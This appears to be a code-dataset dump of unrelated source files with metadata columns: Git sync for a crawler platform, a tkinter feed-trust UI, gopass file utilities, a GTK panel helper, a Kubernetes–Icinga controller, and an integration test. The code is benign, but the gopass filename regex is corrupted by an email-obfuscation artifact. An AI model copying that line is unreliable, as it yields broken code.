gitUrl = formatGitUrl(gitUrl, username, password)
} else {
auth, err := ssh.NewPublicKeysFromFile(username, path.Join(os.Getenv("HOME"), ".ssh", "id_rsa"), "")
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
listOptions = git.ListOptions{
Auth: auth,
}
}
remote := git.NewRemote(storage, &config.RemoteConfig{
URLs: []string{
gitUrl,
}})
rfs, err := remote.List(&listOptions)
if err != nil {
return
}
for _, rf := range rfs {
if rf.Type() == plumbing.SymbolicReference {
continue
}
regex := regexp.MustCompile("refs/heads/(.*)$")
res := regex.FindStringSubmatch(rf.String())
if len(res) > 1 {
branches = append(branches, res[1])
}
}
return branches, nil
}
func formatGitUrl(gitUrl, username, password string) string {
u, _ := url.Parse(gitUrl)
gitHost := u.Hostname()
gitPort := u.Port()
if gitPort == "" {
gitUrl = fmt.Sprintf(
"%s://%s:%s@%s%s",
u.Scheme,
username,
password,
u.Hostname(),
u.Path,
)
} else {
gitUrl = fmt.Sprintf(
"%s://%s:%s@%s:%s%s",
u.Scheme,
username,
password,
gitHost,
gitPort,
u.Path,
)
}
return gitUrl
}
// 重置爬虫Git
func ResetSpiderGit(s model.Spider) (err error) {
// 删除文件夹
if err := os.RemoveAll(s.Src); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return err
}
// 创建空文件夹
if err := os.MkdirAll(s.Src, os.ModePerm); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return err
}
// 同步到GridFS
if err := UploadSpiderToGridFsFromMaster(s); err != nil {
return err
}
return nil
}
// 同步爬虫Git
func SyncSpiderGit(s model.Spider) (err error) {
// 如果 .git 不存在,初始化一个仓库
if !utils.Exists(path.Join(s.Src, ".git")) {
_, err := git.PlainInit(s.Src, false)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
}
// 打开 repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 生成 URL
var gitUrl string
if s.GitUsername != "" && s.GitPassword != "" {
gitUrl = formatGitUrl(s.GitUrl, s.GitUsername, s.GitPassword)
} else {
gitUrl = s.GitUrl
}
// 创建 remote
_ = repo.DeleteRemote("origin")
_, err = repo.CreateRemote(&config.RemoteConfig{
Name: "origin",
URLs: []string{gitUrl},
})
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 生成验证信息
var auth ssh.AuthMethod
if !strings.HasPrefix(s.GitUrl, "http") {
// 为 SSH
regex := regexp.MustCompile("^(?:ssh://?)?([0-9a-zA-Z_]+)@")
res := regex.FindStringSubmatch(s.GitUrl)
username := s.GitUsername
if username == "" {
if len(res) > 1 {
username = res[1]
} else {
username = "git"
}
}
auth, err = ssh.NewPublicKeysFromFile(username, path.Join(os.Getenv("HOME"), ".ssh", "id_rsa"), "")
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
}
// 获取 repo
_ = repo.Fetch(&git.FetchOptions{
RemoteName: "origin",
Force: true,
Auth: auth,
Tags: git.AllTags,
})
// 获得 WorkTree
wt, err := repo.Worktree()
if err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 拉取 repo
if err := wt.Pull(&git.PullOptions{
RemoteName: "origin",
Auth: auth,
ReferenceName: plumbing.HEAD,
SingleBranch: false,
}); err != nil {
if err.Error() == "already up-to-date" {
// 检查是否为 Scrapy
sync := spider_handler.SpiderSync{Spider: s}
sync.CheckIsScrapy()
// 同步到GridFS
if err := UploadSpiderToGridFsFromMaster(s); err != nil {
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 如果没有错误,则保存空字符串
SaveSpiderGitSyncError(s, "")
return nil
}
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 切换分支
if err := wt.Checkout(&git.CheckoutOptions{
Branch: plumbing.NewBranchReferenceName(s.GitBranch),
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 同步到GridFS
if err := UploadSpiderToGridFsFromMaster(s); err != nil {
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 获取更新后的爬虫
s, err = model.GetSpider(s.Id)
if err != nil {
SaveSpiderGitSyncError(s, err.Error())
return err
}
// 检查是否为 Scrapy
sync := spider_handler.SpiderSync{Spider: s}
sync.CheckIsScrapy()
// 如果没有错误,则保存空字符串
SaveSpiderGitSyncError(s, "")
return nil
}
// 添加Git定时任务
func AddGitCronJob(s model.Spider) func() {
return func() {
if err := SyncSpiderGit(s); err != nil {
log.Errorf(err.Error())
debug.PrintStack()
return
}
}
}
// 更新Git定时任务
func UpdateGitCron() {
if err := GitCron.Update(); err != nil {
log.Errorf(err.Error())
return
}
}
// 获取SSH公钥
func GetGitSshPublicKey() string {
if !utils.Exists(path.Join(os.Getenv("HOME"), ".ssh")) ||
!utils.Exists(path.Join(os.Getenv("HOME"), ".ssh", "id_rsa")) ||
!utils.Exists(path.Join(os.Getenv("HOME"), ".ssh", "id_rsa.pub")) {
log.Errorf("no ssh public key")
debug.PrintStack()
return ""
}
content, err := ioutil.ReadFile(path.Join(os.Getenv("HOME"), ".ssh", "id_rsa.pub"))
if err != nil {
return ""
}
return string(content)
}
// 获取Git分支
func GetGitBranches(s model.Spider) (branches []GitBranch, err error) {
// 打开 repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
iter, err := repo.Branches()
if iter == nil {
return branches, nil
}
if err := iter.ForEach(func(reference *plumbing.Reference) error {
branches = append(branches, GitBranch{
Hash: reference.Hash().String(),
Name: reference.Name().String(),
Label: reference.Name().Short(),
})
return nil
}); err != nil {
return branches, err
}
return branches, nil
}
// 获取Git Tags
func GetGitTags(s model.Spider) (tags []GitTag, err error) {
// 打开 repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return tags, err
}
iter, err := repo.Tags()
if iter == nil {
return tags, nil
}
if err := iter.ForEach(func(reference *plumbing.Reference) error {
tags = append(tags, GitTag{
Hash: reference.Hash().String(),
Name: reference.Name().String(),
Label: reference.Name().Short(),
})
return nil
}); err != nil {
return tags, err
}
return tags, nil
}
// 获取Git Head Hash
func GetGitHeadHash(repo *git.Repository) string {
head, _ := repo.Head()
return head.Hash().String()
}
// 获取Git远端分支
func GetGitRemoteBranches(s model.Spider) (branches []GitBranch, err error) {
// 打开 repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
iter, err := repo.References()
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
if err := iter.ForEach(func(reference *plumbing.Reference) error {
if reference.Name().IsRemote() {
log.Infof(reference.Hash().String())
log.Infof(reference.Name().String())
branches = append(branches, GitBranch{
Hash: reference.Hash().String(),
Name: reference.Name().String(),
Label: reference.Name().Short(),
})
}
return nil
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
return branches, err
}
return branches, err
}
// 获取Git Commits
func GetGitCommits(s model.Spider) (commits []GitCommit, err error) {
// 打开 repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return commits, err
}
// 获取分支列表
branches, err := GetGitBranches(s)
branchesDict := map[string][]GitBranch{}
for _, b := range branches {
branchesDict[b.Hash] = append(branchesDict[b.Hash], b)
}
// 获取分支列表
remoteBranches, err := GetGitRemoteBranches(s)
remoteBranchesDict := map[string][]GitBranch{}
for _, b := range remoteBranches {
remoteBranchesDict[b.Hash] = append(remoteBranchesDict[b.Hash], b)
}
// 获取标签列表
tags, err := GetGitTags(s)
tagsDict := map[string][]GitTag{}
for _, t := range tags {
tagsDict[t.Hash] = append(tagsDict[t.Hash], t)
}
// 获取日志遍历器
iter, err := repo.Log(&git.LogOptions{
All: true,
})
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return commits, err
}
// 遍历日志
if err := iter.ForEach(func(commit *object.Commit) error {
gc := GitCommit{
Hash: commit.Hash.String(),
TreeHash: commit.TreeHash.String(),
Message: commit.Message,
Author: commit.Author.Name,
Email: commit.Author.Email,
Ts: commit.Author.When,
IsHead: commit.Hash.String() == GetGitHeadHash(repo),
Branches: branchesDict[commit.Hash.String()],
RemoteBranches: remoteBranchesDict[commit.Hash.String()],
Tags: tagsDict[commit.Hash.String()],
}
commits = append(commits, gc)
return nil
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
return commits, err
}
return commits, nil
}
func GitCheckout(s model.Spider, hash string) (err error) {
// 打开 repo
repo, err := git.PlainOpen(s.Src)
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
// 获取worktree
wt, err := repo.Worktree()
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
//判断远程origin路径是否和当前的GitUrl是同一个,如果不是删掉原来的路径,重新拉取远程代码
remote, err := repo.Remote("origin")
if err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
if remote.String() != s.GitUrl {
utils.RemoveFiles(s.Src)
return SyncSpiderGit(s)
}
// Checkout
if err := wt.Checkout(&git.CheckoutOptions{
Hash: plumbing.NewHash(hash),
Create: false,
Force: true,
Keep: false,
}); err != nil {
log.Error(err.Error())
debug.PrintStack()
return err
}
return nil
}
|
[
"\"HOME\"",
"\"HOME\"",
"\"HOME\"",
"\"HOME\"",
"\"HOME\"",
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
21-fs-ias-lec/feedCtrl/ui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 15:15:14 2020
@author: yannickrummele
"""
import pickle
from tkinter import *
from tkinter import ttk
from .uiFunctionsHandler import *
ufh = UiFunctionHandler()
def update_feedIds():
print("update feedIDs")
feedIDsTree.delete(*feedIDsTree.get_children())
allMasterIDs = list(ufh.get_master_ids())
for i in range(len(allMasterIDs)):
treeUsername=ufh.get_username(allMasterIDs[i])
treeID=allMasterIDs[i].hex()
feedIDsTree.insert('', 'end', treeUsername, text=treeUsername, values=treeID)
feedIDsTree.item(treeUsername, tags = ('master'))
feedIDs=ufh.get_all_master_ids_feed_ids(allMasterIDs[i])
trusted = list(ufh.get_trusted())
blocked = list(ufh.get_blocked())
for feedID in feedIDs:
if feedID in trusted:
treeApplicationName = ufh.get_application(feedID)
treeApplicationID = feedID.hex()
if treeApplicationName is not None:
followedChildname = treeUsername + " followed " + treeApplicationName
feedIDsTree.insert(treeUsername, 'end', followedChildname, text=treeApplicationName,
values=treeApplicationID)
feedIDsTree.item(followedChildname, tags=('followed'))
elif feedID in blocked:
treeApplicationName = ufh.get_application(feedID)
treeApplicationID = feedID.hex()
if treeApplicationName is not None:
blockedChildname = treeUsername + " blocked " + treeApplicationName
feedIDsTree.insert(treeUsername, 'end', blockedChildname, text=treeApplicationName,
values=treeApplicationID)
feedIDsTree.item(blockedChildname, tags=('blocked'))
else:
treeApplicationName = ufh.get_application(feedID)
treeApplicationID = feedID.hex()
if treeApplicationName is not None:
blockedChildname = treeUsername + " blocked " + treeApplicationName
feedIDsTree.insert(treeUsername, 'end', blockedChildname, text=treeApplicationName,
values=treeApplicationID)
feedIDsTree.item(blockedChildname)
def setTrusted():
feedIDsTree.bind('<<TreeviewSelect>>', callback)
print("trusted")
curItemID = (feedIDsTree.selection()[0])
curItem="".join(feedIDsTree.item(feedIDsTree.selection()[0])['values'])
curID=bytes.fromhex(curItem)
print(curItem)
print(curID)
ufh.set_trusted(curID, True)
feedIDsTree.item(curItemID, tags=('followed'))
"""
print("I am trusting")
with open('username.pkl', 'rb') as f:
file = pickle.load(f)
f.close()
username = file.get('username')
print("ui" + username)
ufh.set_trusted_name(username)
"""
def setUntrusted():
feedIDsTree.bind('<<TreeviewSelect>>', callback)
print("untrusted")
curItemID= (feedIDsTree.selection()[0])
curItem = "".join(feedIDsTree.item(feedIDsTree.selection()[0])['values'])
curID = bytes.fromhex(curItem)
print(curItem)
print(curID)
ufh.set_trusted(curID, False)
feedIDsTree.item(curItemID, tags=('blocked'))
def callback(event):
print(feedIDsTree.selection()[0])
def updateUsername():
ufh.set_username(entryUsername.get())
print("New username: " + entryUsername.get())
#entryUsername.delete(0,END)
def updateRadius():
try:
radius=int(entryRadius.get())
ufh.set_radius(radius)
print("New radius: "+ entryRadius.get())
except Exception as e:
print("Insert a integer for the radius")
print(e)
print(entryRadius.get() + " is not a integer")
#generate_test_data()
root = Tk()
root.title("BACnet feedCtrl")
labelWelcome = Label(root, text="Welcome to BACnet feedCtrl.").grid(row=0)
labelInstruction = Label(root, text="Press the button to update the list of the FeedIDs").grid(row=1)
feedIDsTree = ttk.Treeview(root)
feedIDsTree.grid(row=4)
feedIDsTree.config(columns=('id'))
feedIDsTree.heading('#0',text='Name')
feedIDsTree.heading('id',text='ID')
feedIDsTree.tag_configure('master', background='yellow')
feedIDsTree.tag_configure('blocked', background='red')
feedIDsTree.tag_configure('followed', background='green')
feedIDsTree.config(selectmode='browse')
buttonUpdateFeedIDs =Button(root, text="UpdateFeedIDs", width=25, command=update_feedIds).grid(row=3)
buttonTrust = Button(root, text="Trust", width=25, command=setTrusted).grid(row=5)
buttonUntrust = Button(root, text="Untrust", width=25, command=setUntrusted).grid(row=6)
entryUsername = Entry(root)
entryUsername.grid(row=7)
buttonUpdateUsername = Button(root, text="Update Username", width=25, command=updateUsername).grid(row=8)
entryRadius = Entry(root)
entryRadius.grid(row=9)
buttonUpdateRadius = Button(root, text="Update Radius", width=25, command=updateRadius).grid(row=10)
buttonQuit = Button(root, text='Quit', width=25, command=root.destroy).grid(row=12)
def run():
try:
root.mainloop()
root.destroy()
root.close()
exit()
except:
pass
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
pkg/fsutil/fsutil.go
|
package fsutil
import (
"bufio"
"fmt"
"io"
"math/rand"
"os"
"os/user"
"path/filepath"
"regexp"
"strings"
"time"
"github.com/gopasspw/gopass/pkg/debug"
)
var reCleanFilename = regexp.MustCompile(`[^\w\[email protected]]`)
// CleanFilename strips all possibly suspicious characters from a filename
// WARNING: NOT suiteable for pathnames as slashes will be stripped as well!
func CleanFilename(in string) string {
return strings.Trim(reCleanFilename.ReplaceAllString(in, "_"), "_ ")
}
// CleanPath resolves common aliases in a path and cleans it as much as possible
func CleanPath(path string) string {
// http://stackoverflow.com/questions/17609732/expand-tilde-to-home-directory
// TODO: We should consider if we really want to rewrite ~
if len(path) > 1 && path[:2] == "~/" {
usr, _ := user.Current()
dir := usr.HomeDir
if hd := os.Getenv("GOPASS_HOMEDIR"); hd != "" {
dir = hd
}
path = strings.Replace(path, "~/", dir+"/", 1)
}
if p, err := filepath.Abs(path); err == nil {
return p
}
return filepath.Clean(path)
}
// IsDir checks if a certain path exists and is a directory
// https://stackoverflow.com/questions/10510691/how-to-check-whether-a-file-or-directory-denoted-by-a-path-exists-in-golang
func IsDir(path string) bool {
fi, err := os.Stat(path)
if err != nil {
if os.IsNotExist(err) {
// not found
return false
}
debug.Log("failed to check dir %s: %s\n", path, err)
return false
}
return fi.IsDir()
}
// IsFile checks if a certain path is actually a file
func IsFile(path string) bool {
fi, err := os.Stat(path)
if err != nil {
if os.IsNotExist(err) {
// not found
return false
}
debug.Log("failed to check file %s: %s\n", path, err)
return false
}
return fi.Mode().IsRegular()
}
// IsEmptyDir checks if a certain path is an empty directory
func IsEmptyDir(path string) (bool, error) {
empty := true
if err := filepath.Walk(path, func(fp string, fi os.FileInfo, ferr error) error {
if ferr != nil {
return ferr
}
if fi.IsDir() && (fi.Name() == "." || fi.Name() == "..") {
return filepath.SkipDir
}
if !fi.IsDir() {
empty = false
}
return nil
}); err != nil {
return false, err
}
return empty, nil
}
// Shred overwrite the given file any number of times
func Shred(path string, runs int) error {
rand.Seed(time.Now().UnixNano())
fh, err := os.OpenFile(path, os.O_WRONLY, 0600)
if err != nil {
return fmt.Errorf("failed to open file %q: %w", path, err)
}
// ignore the error. this is only taking effect if we error out.
defer fh.Close()
fi, err := fh.Stat()
if err != nil {
return fmt.Errorf("failed to stat file %q: %w", path, err)
}
flen := fi.Size()
// overwrite using pseudo-random data n-1 times and
// use zeros in the last iteration
bufFn := func() []byte {
buf := make([]byte, 1024)
_, _ = rand.Read(buf)
return buf
}
for i := 0; i < runs; i++ {
if i >= runs-1 {
bufFn = func() []byte {
return make([]byte, 1024)
}
}
if _, err := fh.Seek(0, 0); err != nil {
return fmt.Errorf("failed to seek to 0,0: %w", err)
}
var written int64
for {
// end of file
if written >= flen {
break
}
buf := bufFn()
n, err := fh.Write(buf[0:min(flen-written, int64(len(buf)))])
if err != nil {
if err != io.EOF {
return fmt.Errorf("failed to write to file: %w", err)
}
// end of file, should not happen
break
}
written += int64(n)
}
// if we fail to sync the written blocks to disk it'd be pointless
// do any further loops
if err := fh.Sync(); err != nil {
return fmt.Errorf("failed to sync to disk: %w", err)
}
}
if err := fh.Close(); err != nil {
return fmt.Errorf("failed to close file after writing: %w", err)
}
return os.Remove(path)
}
// FileContains searches the given file for the search string and returns true
// iff it's an exact (substring) match.
func FileContains(path, needle string) bool {
fh, err := os.Open(path)
if err != nil {
debug.Log("failed to open %q for reading: %s", path, err)
return false
}
defer fh.Close()
s := bufio.NewScanner(fh)
for s.Scan() {
if strings.Contains(s.Text(), needle) {
return true
}
}
return false
}
func min(a, b int64) int64 {
if a < b {
return a
}
return b
}
|
[
"\"GOPASS_HOMEDIR\""
] |
[] |
[
"GOPASS_HOMEDIR"
] |
[]
|
["GOPASS_HOMEDIR"]
|
go
| 1 | 0 | |
tools.go
|
package main
import (
"fmt"
"math"
"net"
"os"
"os/exec"
"path/filepath"
"strconv"
"strings"
"github.com/gotk3/gotk3/gdk"
"github.com/gotk3/gotk3/glib"
"github.com/gotk3/gotk3/gtk"
)
func check(e error) {
if e != nil {
panic(e)
}
}
func isWayland() bool {
return os.Getenv("XDG_SESSION_TYPE") == "wayland" || os.Getenv("WAYLAND_DISPLAY") != ""
}
func createPixbuf(icon string, size int) *gdk.Pixbuf {
// full path given
iconPath := ""
if strings.HasPrefix(icon, "/") {
iconPath = icon
pixbuf, err := gdk.PixbufNewFromFileAtSize(iconPath, size, size)
if err != nil {
pixbuf, err = gdk.PixbufNewFromFileAtSize(filepath.Join(dataDir(),
"icons_light/icon-missing.svg"), size, size)
check(err)
}
return pixbuf
}
// gtk icons in use - just name given
if iconsDir == "" {
iconTheme, err := gtk.IconThemeGetDefault()
check(err)
pixbuf, err := iconTheme.LoadIcon(icon, size, gtk.ICON_LOOKUP_FORCE_SIZE)
if err != nil {
pixbuf, err = gdk.PixbufNewFromFileAtSize(filepath.Join(dataDir(),
"icons_light/icon-missing.svg"), size, size)
check(err)
}
return pixbuf
}
// just name given, and we don't use gtk icons
iconPath = filepath.Join(iconsDir, fmt.Sprintf("%s.svg", icon))
pixbuf, err := gdk.PixbufNewFromFileAtSize(iconPath, size, size)
if err != nil {
iconTheme, err := gtk.IconThemeGetDefault()
check(err)
pixbuf, err := iconTheme.LoadIcon(icon, size, gtk.ICON_LOOKUP_FORCE_SIZE)
if err != nil {
pixbuf, err = gdk.PixbufNewFromFileAtSize(filepath.Join(dataDir(),
"icons_light/icon-missing.svg"), size, size)
check(err)
}
return pixbuf
}
return pixbuf
}
func launchCommand(command string) {
elements := strings.Split(command, " ")
cmd := exec.Command(elements[0], elements[1:]...)
go cmd.Run()
if !settings.Preferences.DontClose {
glib.TimeoutAdd(uint(100), func() bool {
gtk.MainQuit()
return false
})
}
}
func keyFound(m map[string]string, key string) bool {
for k := range m {
if k == key {
return true
}
}
return false
}
func getBattery(command string) (string, int) {
msg := ""
perc := 0
if strings.Fields(command)[0] == "upower" {
bat := strings.Split(getCommandOutput(command), "\n")
var state, time, percentage string
for _, line := range bat {
line = strings.TrimSpace(line)
if strings.Contains(line, "time to empty") {
strings.Replace(line, "time to empty", "time_to_empty", 0)
}
parts := strings.Fields(line)
for i, l := range parts {
if strings.Contains(l, "state:") {
state = parts[i+1]
}
if strings.Contains(l, "time_to_empty") {
time = parts[i+1]
}
if strings.Contains(l, "percentage") {
pl := len(parts[i+1])
percentage = parts[i+1][:pl-1]
p, err := strconv.Atoi(percentage)
if err == nil {
perc = p
}
}
}
}
msg = fmt.Sprintf("%d%% %s %s", perc, state, time)
} else if strings.Fields(command)[0] == "acpi" {
bat := strings.Fields(getCommandOutput(command))
msg = strings.Join(bat[2:], " ")
pl := len(bat[3])
percentage := bat[3][:pl-2]
p, err := strconv.Atoi(percentage)
if err == nil {
perc = p
}
}
return msg, perc
}
func getBrightness() float64 {
brightness := 0.0
output := getCommandOutput(settings.Commands.GetBrightness)
bri, e := strconv.ParseFloat(output, 64)
if e == nil {
brightness = math.Round(bri)
}
return brightness
}
func setBrightness(value int) {
cmd := exec.Command("light", "-S", fmt.Sprint(value))
cmd.Run()
}
func listInterfaces() []string {
var list []string
interfaces, err := net.Interfaces()
if err != nil {
return list
}
for _, i := range interfaces {
list = append(list, i.Name)
}
return list
}
func interfaceIsUp(name string) (bool, string) {
netInterface, err := net.InterfaceByName(name)
if err != nil {
fmt.Println(err)
return false, ""
}
addrs, _ := netInterface.Addrs()
if len(addrs) > 1 {
ip := addrs[0].String()
if strings.Contains(ip, "/") {
ip = strings.Split(ip, "/")[0]
}
return true, ip
}
return false, ""
}
|
[
"\"XDG_SESSION_TYPE\"",
"\"WAYLAND_DISPLAY\""
] |
[] |
[
"XDG_SESSION_TYPE",
"WAYLAND_DISPLAY"
] |
[]
|
["XDG_SESSION_TYPE", "WAYLAND_DISPLAY"]
|
go
| 2 | 0 | |
pkg/controller/kubernetes-icinga.go
|
package main
import (
"flag"
"os"
log "github.com/sirupsen/logrus"
"github.com/Nexinto/go-icinga2-client/icinga2"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/tools/clientcmd"
icingaclientset "github.com/Nexinto/kubernetes-icinga/pkg/client/clientset/versioned"
"gopkg.in/yaml.v2"
)
func main() {
flag.Parse()
// If this is not set, glog tries to log into something below /tmp which doesn't exist.
flag.Lookup("log_dir").Value.Set("/")
if e := os.Getenv("LOG_LEVEL"); e != "" {
if l, err := log.ParseLevel(e); err == nil {
log.SetLevel(l)
} else {
log.SetLevel(log.WarnLevel)
log.Warnf("unknown log level %s, setting to 'warn'", e)
}
}
var kubeconfig string
if e := os.Getenv("KUBECONFIG"); e != "" {
kubeconfig = e
}
clientConfig, err := clientcmd.BuildConfigFromFlags("", kubeconfig)
if err != nil {
panic(err.Error())
}
kubernetesclient, err := kubernetes.NewForConfig(clientConfig)
if err != nil {
panic(err.Error())
}
icingaclient, err := icingaclientset.NewForConfig(clientConfig)
if err != nil {
panic(err.Error())
}
var tag string
if e := os.Getenv("TAG"); e != "" {
tag = e
} else {
tag = "kubernetes"
}
icingaApi, err := icinga2.New(icinga2.WebClient{
URL: os.Getenv("ICINGA_URL"),
Username: os.Getenv("ICINGA_USER"),
Password: os.Getenv("ICINGA_PASSWORD"),
Debug: os.Getenv("ICINGA_DEBUG") == "true",
InsecureTLS: true})
if err != nil {
panic(err.Error())
}
var defaultVars map[string]string
if e := os.Getenv("DEFAULT_VARS"); e != "" {
err := yaml.Unmarshal([]byte(e), &defaultVars)
if err != nil {
panic("error parsing DEFAULT_VARS: " + err.Error())
}
}
c := &Controller{
Kubernetes: kubernetesclient,
IcingaClient: icingaclient,
Icinga: icingaApi,
Tag: tag,
DefaultVars: defaultVars,
}
switch os.Getenv("MAPPING") {
case "hostgroup":
c.Mapping = &HostGroupMapping{}
case "host":
c.Mapping = &HostMapping{}
default:
c.Mapping = &HostGroupMapping{}
}
c.Initialize()
if err := c.Mapping.MonitorCluster(c); err != nil {
log.Errorf("error setting up monitoring for the cluster: %s", err.Error())
}
go c.RefreshComponentStatutes()
go c.EnsureDefaultHostgroups()
go c.IcingaHousekeeping()
c.Start()
}
|
[
"\"LOG_LEVEL\"",
"\"KUBECONFIG\"",
"\"TAG\"",
"\"ICINGA_URL\"",
"\"ICINGA_USER\"",
"\"ICINGA_PASSWORD\"",
"\"ICINGA_DEBUG\"",
"\"DEFAULT_VARS\"",
"\"MAPPING\""
] |
[] |
[
"LOG_LEVEL",
"ICINGA_URL",
"KUBECONFIG",
"ICINGA_PASSWORD",
"MAPPING",
"TAG",
"DEFAULT_VARS",
"ICINGA_USER",
"ICINGA_DEBUG"
] |
[]
|
["LOG_LEVEL", "ICINGA_URL", "KUBECONFIG", "ICINGA_PASSWORD", "MAPPING", "TAG", "DEFAULT_VARS", "ICINGA_USER", "ICINGA_DEBUG"]
|
go
| 9 | 0 | |
integration/cloud_mta_build_tool_test.go
|
// +build integration
package integration_test
import (
"archive/zip"
"bufio"
"bytes"
"fmt"
"io/ioutil"
"log"
"os"
"os/exec"
"path/filepath"
"runtime"
"strings"
"time"
. "github.com/onsi/ginkgo"
. "github.com/onsi/ginkgo/extensions/table"
. "github.com/onsi/gomega"
"github.com/pkg/errors"
dir "github.com/SAP/cloud-mta-build-tool/internal/archive"
"github.com/SAP/cloud-mta/mta"
)
const (
demoArchiveName = "mta_demo_0.0.1.mtar"
//javaArchiveName = "com.fetcher.project_0.0.1.mtar"
binPath = "mbt"
)
var _ = Describe("Integration - CloudMtaBuildTool", func() {
var mbtName = ""
BeforeSuite(func() {
By("Building MBT")
if runtime.GOOS == "linux" || runtime.GOOS == "darwin" {
mbtName = "mbt"
} else {
mbtName = "mbt.exe"
}
// This runs locally for testing purpose only
/* #nosec */
cmd := exec.Command("go", "build", "-o", filepath.Join(os.Getenv("GOPATH"), "/bin/"+mbtName), ".")
cmd.Dir = filepath.FromSlash("../")
err := cmd.Run()
if err != nil {
fmt.Println("binary creation failed: ", err)
}
})
AfterSuite(func() {
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/" + mbtName))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/mtad.yaml"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/abc.mtar"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/myModule/target"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/Makefile.mta"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/mtad.yaml"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_java/mta_archives"))).Should(Succeed())
Ω(os.RemoveAll(filepath.FromSlash("./testdata/mta_demo/node/package-lock.json"))).Should(Succeed())
})
var _ = Describe("Command to provide the list of modules", func() {
It("Getting module", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash(binPath)
cmdOut, cmdErr, err := execute(bin, "provide modules", path)
Ω(err).Should(Succeed(), cmdErr)
Ω(cmdOut).ShouldNot(BeNil())
Ω(cmdOut).Should(ContainSubstring("[node node-js]" + "\n"))
})
It("Command name error", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/")
bin := filepath.FromSlash(binPath)
_, _, err := execute(bin, "provide modules 2", path)
Ω(err).Should(HaveOccurred())
})
})
var _ = Describe("Generate the Makefile according to the mta.yaml file", func() {
It("Generate Makefile for mta_demo", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_demo")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "init", path)
Ω(err).Should(Succeed(), errOut)
// Check the MakeFile was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "Makefile.mta")).Should(BeAnExistingFile())
})
It("Generate Makefile for mta_java", func() {
dir, _ := os.Getwd()
path := filepath.Join(dir, "testdata", "mta_java")
bin := filepath.FromSlash(binPath)
_, errOut, err := execute(bin, "init", path)
Ω(err).Should(Succeed(), errOut)
// Check the MakeFile was generated
Ω(filepath.Join(dir, "testdata", "mta_java", "Makefile.mta")).Should(BeAnExistingFile())
})
It("Command name error", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash(binPath)
_, _, err := execute(bin, "init 2", path)
Ω(err).Should(HaveOccurred())
})
})
var _ = Describe("Generate MTAR", func() {
It("Generate MTAR with provided target and mtar name", func() {
dir, _ := os.Getwd()
Ω(os.RemoveAll(filepath.Join(dir, "testdata", "mta_demo", demoArchiveName))).Should(Succeed())
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
cmdOut, errOut, err := execute(bin, "-f Makefile.mta p=cf mtar=abc t="+path, path)
Ω(err).Should(Succeed(), errOut)
Ω(cmdOut).ShouldNot(BeEmpty())
// Check the archive was generated
Ω(filepath.Join(dir, "testdata", "mta_demo", "abc.mtar")).Should(BeAnExistingFile())
})
It("Generate MTAR - wrong platform", func() {
dir, _ := os.Getwd()
path := dir + filepath.FromSlash("/testdata/mta_demo")
bin := filepath.FromSlash("make")
out, errOut, err := execute(bin, "-f Makefile.mta p=xxx mtar=xyz1", path)
Ω(err).Should(HaveOccurred())
Ω(out + errOut).Should(ContainSubstring(`ERROR invalid target platform "xxx"; supported platforms are: "cf", "neo", "xsa"`))
Ω(filepath.Join(dir, "testdata", "mta_demo", "mta_archives", "xyz1.mtar")).ShouldNot(BeAnExistingFile())
})
var _ = Describe("MBT build - generates Makefile and executes it", func() {
